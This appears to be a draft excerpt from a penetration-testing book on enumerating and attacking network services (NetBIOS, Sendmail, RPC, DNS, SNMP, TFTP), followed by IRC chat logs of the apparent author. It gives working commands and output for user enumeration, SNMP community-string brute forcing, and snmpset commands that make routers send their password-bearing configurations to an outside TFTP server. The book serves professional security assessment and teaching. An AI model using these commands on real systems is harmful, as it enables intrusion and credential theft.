Enumeration through the NetBIOS session service
Various tools can be used to enumerate a lot of sensitive information from
a target Windows workstation or server with TCP port 139 open. Information
can be gleaned either anonymously by setting up what is known as a null
session, or through knowledge of a valid username and password.
By default, Windows NT and 2000 hosts do not prohibit anonymous access to
information through NetBIOS, and so the following can be gleaned:
User list
Machine list
NetBIOS name list
Share list
Password policy information
Group and member list
Local Security Authority policy information
Trust information between domains and hosts
NIC IP and MAC addresses
Three tools in particular are very good at enumerating this information
Enum.exe
Dumpsec.exe,
dumpsec /computer=IPaddress /rpt=users /saveas=tsv /outfile=users.txt
Winfo.exe
Brute force of user passwords through the NetBIOS session service
SMBcrack.exe uses TCP 139 and crafts SMB packets
net use * //target/share passwd/user:domain/username
VPN & Remote Network Access Services
IPsec VPN tunnels and services do not even use standard IP, and are
therefore lie outside of the scope of this book. However, vendors such as
Checkpoint use IP for VPN communication, which is often more widely
supported.
IP-based VPN and remote network access services are as follows:
FW1-secureremote 256/tcp # also "rap"
FW1-mc-fwmodule 257/tcp # FW1 management console for
communication w/module
Fw1-mc-gui 258/tcp # also yak winsock personal chat
FW1-or-bgmp 264/udp # FW1 secureremote alternate
isakmp 500/tcp # ISAKMP
Checkpoint VPN
256 (TCP) Certificate/key distribution. VPN clients (SecuRemote) can
download keys on this port.
257 (TCP) logging
258 (TCP) Remote control over policy editing.
259?
Microsoft PPTP
Point to Point Tunneling Protocol - tcp/1723
ISAKMP
Internet Security Association and Key Management Protocol (ISAKMP)
This port is available on most systems that support IPsec. Many IPsec-
compatible VPN providers use this port, such as Nortel/Bay Networks
Extranet Access Client.
Tcp and udp 500
Ike-scan by nta monitor
Queries isakmp and works out vpn gateway type from responses
Network Proxy Services
Squid 3128
Socks 1080
Web 8080
It is possible to port scan through socks et al
E-Mail & News Services
Services used for e-mail and news delivery listed from the services file
are as follows:
smtp 25/tcp
pop2 109/tcp
pop3 110/tcp
nntp 119/tcp
imap2 143/tcp
Sendmail
Most Unix-based systems run Sendmail, including Linux, Solaris, OpenBSD and
others. Sendmail is particularly vulnerable to two specific types of
attack:
Information leak vulnerabilities
Process manipulation vulnerabilities
Sendmail Information Leak Vulnerabilities
If the Sendmail banner is obfuscated or modified, the true version of
Sendmail can usually be ascertained by issuing a HELP request (Sun Sendmail
8.9.3 in this case):
# telnet mx4.sun.com 25
Trying 192.18.42.14...
Connected to nwkea-mail-2.sun.com.
Escape character is '^]'.
220 nwkea-mail-2.sun.com ESMTP Sendmail ready at Tue, 7 Jan
2003 02:25:20 -0800 (PST)
HELO world
250 nwkea-mail-2.sun.com Hello no-dns-yet.demon.co.uk
[62.49.20.20] (may be forged), pleased to meet you
HELP
214-This is Sendmail version 8.9.3+Sun
214-Commands:
214- HELO MAIL RCPT DATA RSET
214- NOOP QUIT HELP VRFY EXPN
214-For more info use "HELP <topic>".
214-smtp
214-To report bugs in the implementation contact Sun
Microsystems
214-Technical Support.
214-For local information contact postmaster at this site.
214 End of HELP info
Valid user account details can be enumerated using one of three techniques:
EXPN username
VRFY username
RCPT TO:username
EXPN
The Sendmail EXPN command is historically used to expand details about a
given SMTP e-mail address. Detailed in figure xx below, we can ascertain
the following:
The test user account does not exist locally on the server
E-mail for root is infact sent to chris.mcnab@trustmatta.com
The sshd user account exists locally with the real name of sshd privsep
Figure xx: Using EXPN to enumerate user details
# telnet 10.0.10.11 25
Trying 10.0.10.11...
Connected to 10.0.10.11.
Escape character is '^]'.
220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan
2003 03:19:58 -0700 (MST)
HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased
to meet you
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 <chris.mcnab@trustmatta.com>
EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>
VRFY
The Sendmail VRFY command is historically used to verify that a given SMTP
e-mail address is valid. We can abuse this feature to enumerate valid local
user accounts, as detailed in figure xx below.
Figure xx: Using VRFY to enumerate user accounts
# telnet 10.0.10.11 25
Trying 10.0.10.11...
Connected to 10.0.10.11.
Escape character is '^]'.
220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan
2003 03:19:58 -0700 (MST)
HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased
to meet you
VRFY test
550 5.1.1 test... User unknown
VRFY chris
250 2.1.5 Chris McNab <chris@mail2>
RCPT TO:
I have found this technique to be extremely effective at enumerating active
user accounts on even the most secure hosts. Many security conscious
network administrators ensure that EXPN and VRFY commands are not
accessible, but the RCPT TO: enumeration bug takes advantage of a
vulnerability deep within the Sendmail program, one that is not easily
removed without modification of source code.
Figure xx: Executing the RCPT TO: user enumeration attack
# telnet 10.0.10.11 25
Trying 10.0.10.11...
Connected to 10.0.10.11.
Escape character is '^]'.
220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan
2003 03:19:58 -0700 (MST)
HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased
to meet you
MAIL FROM:test@test.org
250 2.1.0 test@test.org... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:chris
250 2.1.5 chris... Recipient ok
Even Sendmail services protected by a firewall SMTP proxy (such as that
found on the Watchguard Firebox) are vulnerable to the RCPT TO: attack,
though suspicious commands such as EXPN, VRFY and HELP are filtered, as
shown below in figure xx.
Figure xx: Enumerating local users with Sendmail behind a firewall
# telnet 10.0.10.10 25
Trying 10.0.10.10...
Connected to 10.0.10.10.
Escape character is '^]'.
220
************************0*0*0*0*0*0*******2******2002********0
***
HELO world
250 mailserv.trustmatta.com Hello onyx [192.168.0.252],
pleased to meet you
EXPN test
500 5.5.1 Command unrecognized: "XXXX test"
VRFY test
500 5.5.1 Command unrecognized: "XXXX test"
HELP
500 5.5.1 Command unrecognized: "XXXX"
MAIL FROM:test@test.org
250 2.1.0 test@test.org... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:chris
250 2.1.5 chris... Recipient ok
RCPT TO:nick
250 2.1.5 nick... Recipient ok
Sendmail Process Manipulation Vulnerabilities
The following remotely exploitable process manipulation vulnerabilities
exist in Sendmail:
Sendmail 8.8.3 and 8.8.4 MIME conversion buffer overflow (CVE-1999-0057)
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=sendmail
MS Exchange ESMTP
Qpopper
MS Exchange POP3
Web Services
HTTP and HTTPS services can be assessed using the following:
Whisker
N-Stealth
Netcraft.com
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
Microsoft IIS
Global.asa
ISAPI filters
IDA, IDQ, IDC, HTR, HTW, PRINTER
Apache
Netscape enterprise
OpenSSL
Proxy Services
Squid - 3128
Socks - 1080
8080
HTTP CONNECT proxy on port 80
Database Services
Services that can be used by systems administrators or server operators to
directly access
1521 / 1524 (oracle), 1433, 3307 ?? (mysql), postgres.. etc.
sybase 2638/tcp # Sybase database
66 (TCP/UDP) Early assignment for Oracle SQL*NET
118 (TCP/UDP) sqlserv
150 (TCP/UDP) SQL-NET
156 (TCP/UDP) sqlsrv
1114 (TCP/UDP) mini-SQL
1433 (TCP/UDP) Microsoft SQL Server
1434 (TCP/UDP) Microsoft SQL Monitor
1498 (TCP/UDP) Sybase SQL AnyWhere
1521 (TCP) Oracle SQL*Net v2
1522 (TCP) Oracle
1525 (TCP) Oracle SQL*Net v1
1529 (TCP) Oracle SQL*Net
1978 (TCP/UDP) UniSQL
1979 (TCP) UniSQL Java
3306 (TCP/UDP) mySQL
3352 (TCP/UDP) SSQL
4333 (TCP) mSQL
Unix RPC Services
A number of interesting Unix services (including NIS+ and NFS) are RPC
services. RPC stands for Remote Procedure Call, and RPC services often run
on dynamically assigned high ports. To track and present clients with
accurate service details, an RPC portmapper service listens on TCP (and
sometimes UDP) port 111. The portmapper service can be queried using the
rpcinfo command found on most Unix-based platforms:
# rpcinfo -p 192.168.0.50
program vers proto port service
100000 4 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100024 1 udp 32772 status
100024 1 tcp 32771 status
100021 4 udp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100005 1 udp 32781 mountd
100005 1 tcp 32776 mountd
100003 2 udp 2049 nfs
100011 1 udp 32822 rquotad
100002 2 udp 32823 rusersd
100002 3 tcp 33180 rusersd
In this case, the Solaris server at hand is running the following RPC
services:
Status (also known as rpc.statd) on TCP port 32771 and UDP port 32772
Nlockmgr (also known as rpc.lockd) on TCP and UDP port 4045
NFS on UDP port 2049
Rquotad on UDP port 32822
Rusersd on TCP port 33180 and UDP port 32823
These services can then be accessed and queried directly, using client
software such as showmount and mount (for accessing NFS and its status,
lockd & rquotad components), and rusers as discussed earlier in this
chapter.
A list of popular RPC services along with their respective prognum values
is as follows (taken from the Unix /etc/rpc file):
portmapper 100000 portmap sunrpc
rstatd 100001 rstat rstat_svc rup perfmeter
rusersd 100002 rusers
nfs 100003 nfsprog
ypserv 100004 ypprog
mountd 100005 mount showmount
ypbind 100007
walld 100008 rwall shutdown
yppasswdd 100009 yppasswd
etherstatd 100010 etherstat
rquotad 100011 rquotaprog quota rquota
sprayd 100012 spray
3270_mapper 100013
rje_mapper 100014
selection_svc 100015 selnsvc
database_svc 100016
rexd 100017 rex
alis 100018
sched 100019
llockmgr 100020
nlockmgr 100021
x25.inr 100022
statmon 100023
status 100024
bootparam 100026
ypupdated 100028 ypupdate
keyserv 100029 keyserver
tfsd 100037
nsed 100038
nsemntd 100039
ypxfrd 100069
pcnfsd 150001
amd 300019 amq
sgi_fam 391002
Identifying RPC Services Without the Portmapper
In networks protected by firewalls and other mechanisms, it is not uncommon
for access to the RPC portmapper service running on port 111 to be
filtered. Determined attackers will often scan high port ranges (usually
between 32000 and 33000) looking for RPC services listening on high ports,
and then attempt to compromise these RPC services.
A list of common RPC service ports and their respective daemons under the
Sun Microsystems Solaris operating platform is as follows (taken from nmap-
services):
sometimes-rpc5 32771/tcp # Sometimes rusersd
sometimes-rpc6 32771/udp # Sometimes rusersd
sometimes-rpc7 32772/tcp # Sometimes status
sometimes-rpc8 32772/udp # Sometimes status
sometimes-rpc9 32773/tcp # Sometimes rquotad
sometimes-rpc10 32773/udp # Sometimes rquotad
sometimes-rpc11 32774/tcp # Sometimes rusersd
sometimes-rpc12 32774/udp # Sometimes rusersd
sometimes-rpc13 32775/tcp # Sometimes status
sometimes-rpc14 32775/udp # Sometimes status
sometimes-rpc15 32776/tcp # Sometimes sprayd
sometimes-rpc16 32776/udp # Sometimes sprayd
sometimes-rpc17 32777/tcp # Sometimes walld
sometimes-rpc18 32777/udp # Sometimes walld
sometimes-rpc19 32778/tcp # Sometimes rstatd
sometimes-rpc20 32778/udp # Sometimes rstatd
sometimes-rpc25 32786/tcp # Sometimes mountd
sometimes-rpc27 32787/tcp # Sometimes dmispd (DMI Service
Provider)
RPC Services of Interest
Rexd
On host command
Rstatd
Rusers
Rusers -l host
Nfs
Showmount -e host
Nis
Walld
Sprayd
Nlockmgr & status
Ypbind & ypupdated
Network Printing Services
Primarily when assessing internal networks, printers and other devices
which using IP can be found. In particular, HP printers are commonly found
with specific TCP ports open. A listing of common network printing services
includes:
9100 HP management
hp-fun.c by sil
515 LPD
----[ 2.1 Chapter 6, Assessing UDP Network Services
Assessing UDP Network Services
This chapter focuses on the steps taken to properly test accessible UDP
network services during a network security assessment exercise. UDP
services are often accessible on poorly configured or protected hosts; with
vulnerable services that can be abused to glean network information, or to
compromise network devices directly through process manipulation and buffer
overflow attacks.
In particular, the assessment five key UDP services is covered in this
chapter:
DNS, listening on port 53
SNMP, listening on port 161
TFTP, listening on port 69
DHCP, listening on ports 67 and 68
Rwhod, listening on port 513
DNS
The DNS service uses two ports to fulfill requests; UDP port 53 to serve
standard direct requests (to resolve names to IP addresses and vice versa),
and TCP port 53 to serve DNS zone information during a DNS zone transfer.
This following section relates entirely to the assessment and probing of
DNS over UDP.
Retrieving DNS Version Information
DNS server version information can be gleaned directly across UDP port 53
by issuing a version.bind chaos txt request through the Unix dig utility as
shown in figure xx. In our example against mail.hmgcc.gov.uk, we find that
BIND 9.2.1 is running.
Figure xx: Using dig to retrieve BIND version information
# dig @mail.hmgcc.gov.uk version.bind chaos txt
; <<>> DiG 9.2.0 <<>> @mail.hmgcc.gov.uk version.bind chaos
txt
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21612
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0,
ADDITIONAL: 0
;; QUESTION SECTION:
;version.bind. CH TXT
;; ANSWER SECTION:
version.bind. 0 CH TXT "9.2.1"
;; Query time: 29 msec
;; SERVER: 195.217.192.1#53(mail.hmgcc.gov.uk)
;; MSG SIZE rcvd: 48
If you do not have access to the dig utility, nslookup can be used in an
interactive fashion from Windows, Unix or MacOS to perform the same
version.bind request, as shown in figure xx. In this second example we find
that relay2.ucia.gov is running BIND 4.9.11, one of the latest versions of
the BIND 4 DNS server software.
Figure xx: Using nslookup to retrieve BIND version information
# nslookup
> server relay2.ucia.gov
Default server: relay2.ucia.gov
Address: 198.81.129.194#53
> set class=chaos
> set type=txt
> version.bind
Server: relay2.ucia.gov
Address: 198.81.129.194#53
VERSION.BIND text = "4.9.11-REL"
BIND Vulnerabilities
The Berkeley Internet Name Daemon is run on most Unix name servers. BIND
has been found to be vulnerable to a plethora of buffer overflow and denial
of service attacks over recent years, and the Internet Software Consortium
has created a very useful HTML page to track all publicly known
vulnerabilities in BIND, accessible at www.isc.org/products/BIND/bind-
security.html. At the bottom of the ISC page is an excellent matrix
documenting exactly which versions of BIND are vulnerable to each known
attack. What follows is a summary of remotely exploitable vulnerabilities
within BIND to date, with details of the affected versions of software.
Remote Execution of Code Vulnerabilities in BIND
SIG overflow, affecting BIND 4.9.5 - 4.9.10, 8.1, 8.2 - 8.2.6 and 8.3.0 -
8.3.3
NXDOMAIN overflow, affecting BIND 8.2 - 8.2.6 and 8.3.0 - 8.3.3
libresolv overflow, affecting BIND 4.9.2 - 4.9.10
OpenSSL overflow, affecting BIND 9.1.0 and 9.2.x if built with SSL support
libbind overflow, affecting all versions of the stub resolver library from
BIND 4 prior to 4.9.9, BIND 8 prior to 8.2.6 and 8.3.0 - 8.3.2, and BIND
9.2.0 (also 9.2.1 if compiled with -enable-libbind)
TSIG overflow, affecting BIND 8.2, 8.2.1, 8.2.2 patch levels 1 - 7 and all
8.2.3 beta releases
NslookupComplain() bug, affecting BIND 4.9.3, 4.9.4, 4.9.5, 4.9.5 patch
level 1, 4.9.6 and 4.9.7
NXT record overflow bug, affecting BIND 8.2, 8.2 patch level 1 and 8.2.1
Remote Denial of Service (DoS) Vulnerabilities in BIND
Internal consistency check vulnerability, affecting all BIND 9 versions
prior to 9.2.1
ZXFR vulnerability, affecting BIND 8.2.2 and patch levels 1 - 6
sigdiv0 vulnerability, affecting BIND 8.2, 8.2.1 and 8.2.2 patch levels 1 -
5
SRV record bug, affecting BIND 8.2, 8.2.1 and 8.2.2 patch levels 1 - 6
SO_LINGER timeout bug, affecting BIND 8.1, 8.1.1, 8.1.2, 8.2 and 8.2.1
FDMAX vulnerability, affecting BIND 8.1, 8.1.1, 8.1.2, 8.2 and 8.2 patch
level 1
SIG record bug, affecting BIND 4.9.5, 4.9.5 patch level 1, 4.9.6, 8.1,
8.1.1, 8.2, 8.2 patch level 1 and 8.2.1
MAXDNAME bug, affecting BIND 4.9.5, 4.9.5 patch level 1, 4.9.6, 4.9.7,
4.9.8, 8.1, 8.1.1, 8.1.2, 8.2, 8.2 patch level 1, 8.2.1, 8.2.2 and 8.2.2
patch level 1
Exploit scripts for some of these vulnerabilities are publicly available
from archive sites such as Packet Storm (www.packetstormsecurity.org).
Various public tools to assess and exploit remote code execution bugs have
been harvested and can be found at www.trustmatta.com/tools/bind/.
Microsoft DNS Service Vulnerabilities
Windows 2000 in particular ships with built-in DNS services running. As the
Windows platform moves towards a native Active Directory model, historic
naming services such as WINS are being superceded by DNS.
At the time of writing, there is no easy way of listing current Windows
2000 Server DNS vulnerabilities. Due to the way that DNS is built into the
core operating system, you must currently trawl through an abundance of
vulnerabilities on the Microsoft Technet Security site
(www.microsoft.com/technet/security) before coming across specific DNS
server issues. A Google web search however, will often spread light over
recent problems.
DNS Information Leaks
Until recently, Checkpoint Firewall-1 shipped with a DNS allow any to any
rule within its default policy. Many other firewalls also suffer from this
oversight, and so it is often possible to access DNS services running on
internal systems that really shouldn't be providing name service to the
Internet.
During a penetration test I undertook in 1998 against a multinational
corporation, I was able to find that many internal network devices used a
large class-a IP space (using IP addresses gleaned through other
information leak vulnerabilities in SMTP and HTTP servers in particular).
After initial port scanning, I found a handful of accessible DNS servers,
which in turn seemed to be connected to the internal network. I was able to
enumerate internal hosts and networks through one name server in
particular, allowing me to build a detailed map of the internal network
space.
It is sometimes possible to connect directly to DNS servers on peripheral
network boundaries (using UDP port 53), and issue requests relating to
internal IP addresses, host names and networks, as shown in figure xx
below.
Figure xx: Using nslookup to map internal IP addresses
# nslookup
> set querytype=any
> server 144.51.5.2
Default server: 144.51.5.2
Address: 144.51.5.2#53
> 192.168.1.23
;; connection timed out; no servers could be reached
> 192.168.1.24
;; connection timed out; no servers could be reached
> 192.168.1.25
Server: 144.51.5.2
Address: 144.51.5.2#53
23.1.168.192.in-addr.arpa name = exchange.internal-
net.local.
An automated reverse DNS sweep tool such as ghba can even be modified to
query a specific name server for internal network information, this can
also be achieved without modifying source code by setting your
/etc/resolv.conf file to point at the target name server instead of your
local DNS servers.
SNMP
The Simple Network Management Protocol service listens on UDP port 161.
SNMP is often found running on network infrastructure devices such as
managed switches, routers and other appliances. Increasingly, SNMP can be
found running on Unix-based and Windows servers for central network
management purposes.
SNMP authentication is very simple and is sent across networks in
plaintext. SNMP MIB (Management Information Base) data can be retrieved
from a device by specifying the correct read community string, and SNMP MIB
data can be written to a device using the correct write community string.
MIB databases contain ASCII listings of OID (Object Identifier) values,
such as routing table information, network statistics, details of network
interfaces, and other information. Accessing a router MIB is useful when
performing further network reconnaissance and mapping.
When a remote attacker is faced with an SNMP service, he has two options:
Brute force SNMP community strings to access and manipulate OID values
Send malformed data to a vulnerable SNMP service, causing a buffer overflow
resulting in either a service crash or arbitrary code being executed on the
host or device
Two useful tools that are used by attackers and security consultants alike
for brute forcing SNMP community strings and accessing MIB entries are
ADMsnmp and snmpwalk.
ADMsnmp
The ADMsnmp tool is available from the ADM group home page at
adm.freelsd.net/ADM/. The utility is an effective command-line community
string brute force utility, and will run under most Unix-like platforms,
including Linux and FreeBSD. Figure xx below shows the ADMsnmp tool in use
against a Cisco router at 192.168.0.1 to find that the community string
private has write access.
Figure xx: Using ADMsnmp to brute force valid community strings
# ADMsnmp 192.168.0.1
ADMsnmp vbeta 0.1 (c) The ADM crew
ftp://ADM.isp.at/ADM/
greets: !ADM, el8.org, ansia
>>>>>>>>>>> get req name=root id = 2 >>>>>>>>>>>
>>>>>>>>>>> get req name=public id = 5 >>>>>>>>>>>
>>>>>>>>>>> get req name=private id = 8 >>>>>>>>>>>
>>>>>>>>>>> get req name=write id = 11 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0
<<<<<<<<<<
>>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>>
>>>>>>>>>>> get req name=admin id = 14 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0
<<<<<<<<<<
>>>>>>>>>>> get req name=proxy id = 17 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0
<<<<<<<<<<
>>>>>>>>>>> get req name=ascend id = 20 >>>>>>>>>>>
<<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0
<<<<<<<<<<
>>>>>>>>>>> get req name=cisco id = 23 >>>>>>>>>>>
>>>>>>>>>>> get req name=router id = 26 >>>>>>>>>>>
>>>>>>>>>>> get req name=shiva id = 29 >>>>>>>>>>>
>>>>>>>>>>> get req name=all private id = 32 >>>>>>>>>>>
>>>>>>>>>>> get req name= private id = 35 >>>>>>>>>>>
>>>>>>>>>>> get req name=access id = 38 >>>>>>>>>>>
>>>>>>>>>>> get req name=snmp id = 41 >>>>>>>>>>>
<!ADM!> snmp check on pipex-gw.trustmatta.com
<!ADM!>
sys.sysName.0:pipex-gw.trustmatta.com
name = private write access
Snmpwalk
The snmpwalk utility is part of the Net-SNMP (previously UCD-SNMP) suite of
tools available from net-snmp.sourceforge.net. The Net-SNMP toolkit can be
built on both Unix and Windows platforms, and contains other useful
utilities including snmpset (used to modify and set specific OID values).
Snmpwalk is used with the correct community string to download the entire
MIB database from the target device (unless a specific OID value to walk is
provided by the user). Figure xx below shows the snmpwalk utility being
used to download the MIB database from a Cisco router. The MIB is actually
around seven pages in length, so only the first 8 OID values are presented
here as an example.
Figure xx: Using snmpwalk to access the MIB through SNMP
# snmpwalk -c public 192.168.0.1
system.sysDescr.0 = Cisco Internetwork Operating System
Software IOS (tm) C2600 Software (C2600-IS-M), Version
12.0(6), RELEASE SOFTWARE (fc1) Copyright (c) 1986-1999 by
cisco Systems, Inc. Compiled Wed 11-Aug-99 00:16 by phanguye
system.sysObjectID.0 = OID: enterprises.9.1.186
system.sysUpTime.0 = Timeticks: (86128) 0:14:21.28
system.sysContact.0 =
system.sysName.0 = pipex-gw.trustmatta.com
system.sysLocation.0 =
system.sysServices.0 = 78
system.sysORLastChange.0 = Timeticks: (0) 0:00:00.00
Default Community Strings
Most routers, switches and wireless access points from Cisco, 3Com,
Foundry, D-Link and other companies use public and private as their
respective default read and write SNMP community strings. The community
string list provided with the ADMsnmp brute force program includes cisco,
router, enable, admin, read, write and other obvious values. It is often
recommended that when assessing routers or devices belonging to a specific
organization, that you tailor your list accordingly (including the company
name and other values that may be used in that instance).
Compromising Devices Through Reading from SNMP
Many Windows NT and 2000 servers run SNMP services, using the community
string of public for read access. By walking through the
1.3.6.1.4.1.77.1.2.25 OID within a Windows NT or 2000 server, we can
enumerate user names of active accounts on the target host 192.168.0.251:
# snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25
enterprises.77.1.2.25.1.1.8.119.105.114.101.108.101.115.115 =
"Chris"
enterprises.77.1.2.25.1.1.12.73.85.83.82.95.67.65.82.84.77.65.7
8 = "IUSR_CARTMAN"
enterprises.77.1.2.25.1.1.12.73.87.65.77.95.67.65.82.84.77.65.7
8 = "IWAM_CARTMAN"
enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114
.97.116.111.114 = "Administrator"
enterprises.77.1.2.25.1.1.14.84.115.73.110.116.101.114.110.101.
116.85.115.101.114 = "TsInternetUser"
enterprises.77.1.2.25.1.1.15.78.101.116.83.104.111.119.83.101.1
14.118.105.99.101.115 = "NetShowServices"
In the above example, the usernames Chris and Administrator are identified,
along with the built-in Windows IUSR_hostname, IWAM_hostname,
TsInternetUser and NetShowServices users.
Various wireless access points and other hardware appliances have been
known to contain passwords and details of writable community strings
within the accessible MIB. It is highly recommended that for each MIB
downloaded from a device over SNMP, each OID value should be checked
by hand to ensure that any sensitive information is gleaned.
Compromising Devices Through Writing to SNMP
If you have compromised the write community string of a Cisco IOS or Ascend
branded device, a useful attack to gain direct access is to first set up a
TFTP server on an accessible Internet host, and then modify key OID values
on the target device over SNMP using snmpset so that the device
configuration file (containing direct access passwords under Cisco IOS in
particular) can be uploaded to us through TFTP. Examples of this attack
against Cisco IOS and Ascend network devices are shown in figures xx and xx
below.
Figure xx: Writing Cisco IOS OID values to upload the devices
configuration file to a TFTP server listening at 192.168.0.50
# snmpset -r 3 -t 3 192.168.0.1 private
.1.3.6.1.4.1.9.2.1.55.192.168.0.50 s "cisco-config"
Figure xx: Writing Ascend OID values to upload the devices
configuration file to a TFTP server listening at 192.168.0.50
# snmpset -r 3 -t 3 192.168.0.254 private
.1.3.6.1.4.1.529.9.5.3.0 a "192.168.0.50"
# snmpset -r 3 -t 3 192.168.0.254 private
.1.3.6.1.4.1.529.9.5.4.0 s "ascend-config"
In order for this attack to work, we must install and configure an
accessible TFTP server for the appliance to upload its configuration file
to. This can either be achieved from a Unix-based platform by modifying the
/etc/inetd.conf file to run tftpd from inetd, or using a Windows TFTP
server, such as the Cisco TFTP Server, available from www.cisco.com/pcgi-
bin/tablebuild.pl/tftp. One key point to remember when performing this
exploit is to ensure your TFTP server is writeable so that the device can
upload its configuration file.
SNMP running on hardware appliances in particular can be imaginatively
abused by writing to a plethora of different OID values, from modification
of routing tables, to uploading new firmware and configuration files. It is
often best to test SNMP attacks in a lab environment before performing them
in live networks, as crashing routers, switches and other critical
infrastructure devices is often undesirable.
Compromising Devices Through Overflowing SNMP
In 2001, a series of SNMP overflows were released for most operating
platforms, including Windows and Unix-based systems.
TFTP
The Trivial File Transfer Protocol service listens on UDP port 69, and is
often found running on network infrastructure devices including managed
switches and routers. TFTP is most used by network administrators for the
purposes of configuration file and firmware upload and download when
installing and configuring devices.
Cisco 1600 series router proof of concept TFTP exploit
www.securiteam.com/exploits/5KP0O0A81K.html
DHCP
Dynamic Host Configuration Protocol (known as either BOOTP in Unix
environments, or DHCP in Windows environments) allows diskless workstations
to retrieve network and configuration details from the local network on
boot. The service itself listens on UDP port 67, with UDP port 68 being
used by clients for the receipt of network configuration details.
Rwhod
Udp 513
Who, rwho?
Port 137 netbios-ns
NetBIOS name service (UDP)
firewalls: Firewall administrators will frequently see large numbers of
incoming packets to port 137. This is due to the behavior of Windows
servers that use NetBIOS (as well as DNS) to resolve IP addresses to names
using the "gethostbyaddr()" function. As users behind the firewalls surf
Windows-based web sites, those servers will frequently respond with NetBIOS
lookups.
Port 138 netbios-dgm (UDP)
NetBIOS datagram (UDP)
Used by Windows (and services on UNIX like SAMBA). The main danger on the
Internet is that by crafting special messages sent to this port, a hacker
can convince Windows that their machine is "local", and can therefore
bypass some of Microsoft's security settings that differentiate between
"local" and "internet" zones.
--[3. Assorted IRC Logs - A Journey into My Psyche
This is for you guys that weren't in some of the channels I hang out in.
As you can see, I anounced my book quite some time ago ;)
[00:07:27] <so1o> i'm writing a book for o'reilly about pentesting
[00:07:31] <so1o> it'll be out in a couple of months
[00:07:36] <so1o> they paid me a fat advance
[00:07:38] <Haggis> nice
[00:07:44] <so1o> all i gotta do now is finish it
[00:07:53] <Haggis> lol.. yeah.. thats always the problem
[00:08:04] <so1o> yeah well i wrote 70,000 words already
[00:08:12] <so1o> i got another 10,000 or so to go
[00:08:22] <so1o> writing about msrpc security atm
[00:08:29] <so1o> enumerating users through the samr interface
[00:08:30] <so1o> alsortz
[00:08:36] <so1o> msrpc is bonkers
[00:08:41] <so1o> no-one should run that shit on the internet
[00:08:44] <Haggis> lol.. yup... sure is
[00:08:46] <so1o> its full of bugs
[00:08:58] <Haggis> i think they're called 'features'
[00:09:02] <so1o> ha
[00:09:13] <so1o> theres a fundemental flaw in netbios-dgm
[00:09:18] <so1o> that microsoft refuse to patch
[00:09:27] <so1o> because it would mean re-writing half their netbios code
[00:09:38] <Haggis> who the fuck wants netbios anyway?
[00:09:44] <so1o> companies
[00:09:48] <so1o> with big internal networks
[00:09:48] <so1o> :/
[00:09:57] <so1o> thats ok tho
[00:09:59] <Haggis> oh yeah... only half the world!
[00:10:01] <so1o> keeps people like me in a job
[19:58:53] <kraft> do you guys have an oreilly bookshelf
[19:59:58] <so1o> yo yo
[20:00:03] <so1o> <kraft> do you guys have an oreilly bookshelf
[20:00:05] <so1o> :/
[20:00:12] <so1o> im writing a book for oreilly
[20:00:17] <so1o> it gets published in november
[20:00:23] <kraft> which book ?
[20:00:29] <so1o> network security assessment
[20:00:43] <so1o> its about professional pen-testing
[20:00:48] <so1o> internet-based
[20:00:50] <B-r00t> got any samples? .
[20:01:03] <giles> yeah that would be cool to check out
[20:01:22] <so1o> b-r00t nah itz under technical review
[20:01:31] <so1o> i got to pick 3 of my 7 technical reviewers
[20:01:39] <so1o> so picked john mcdonald, ben laurie and david litchfield
[20:01:43] <so1o> its going to be a dark book
[20:02:07] <giles> who is the target of the book
[20:02:21] <so1o> like technical systems / network administrators
[20:02:24] <so1o> and it security teams
[20:02:53] <giles> will you give real world examples of the starting phase
to the end phase, dealing with correct ways to write contracts
[20:02:54] <giles> and such
[20:03:03] <so1o> bro
[20:03:07] <so1o> its a dark book
[20:03:11] <so1o> whats ur email addr
[20:03:16] <so1o> i'll mail u a pdf of chapter 4
[20:03:19] <so1o> the darkest chapter so far
[20:03:20] <so1o> ;]
[20:03:21] <B-r00t> yu got mine!
[20:03:30] <giles> i just msged you mine
[20:03:33] <so1o> wrd
[20:03:36] <so1o> i'll hit u up holmez
[20:03:36] <giles> thx man
[20:03:38] <so1o> drop me a line back
[20:03:43] <so1o> with some comments
[20:04:12] <B-r00t> if yu share yer shit on here ...most co0l ppl will give
yu honest critz...
[20:04:16] <kraft> have you seen that open soure pen test methodology
project ?
[20:04:22] <so1o> yeah its shit
[20:04:27] <so1o> peter herzog is a fucking punk
[20:04:32] <kraft> heh
[20:04:35] <so1o> my book is based on cesg check
[20:04:37] <so1o> and nsa iam
[20:04:45] <so1o> the proper testing methodologies
[20:04:58] <kraft> are you check team leader ?
[20:05:48] <so1o> nope
[20:06:02] <so1o> our company doesnt subscribe to check
[20:06:05] <so1o> 7k/year
[20:06:16] <so1o> yo kraft ru from the uk
[20:06:19] <so1o> what do u do
[20:06:40] <kraft> yup
[20:06:53] <kraft> pen test, consultant etc
[20:07:33] <B-r00t> im a builder .. heh
[20:07:56] <B-r00t> br00t@blueyonder.co.uk
[20:08:01] <marshal-l> I'm a mechanic
[20:09:27] <so1o> ok mail sent
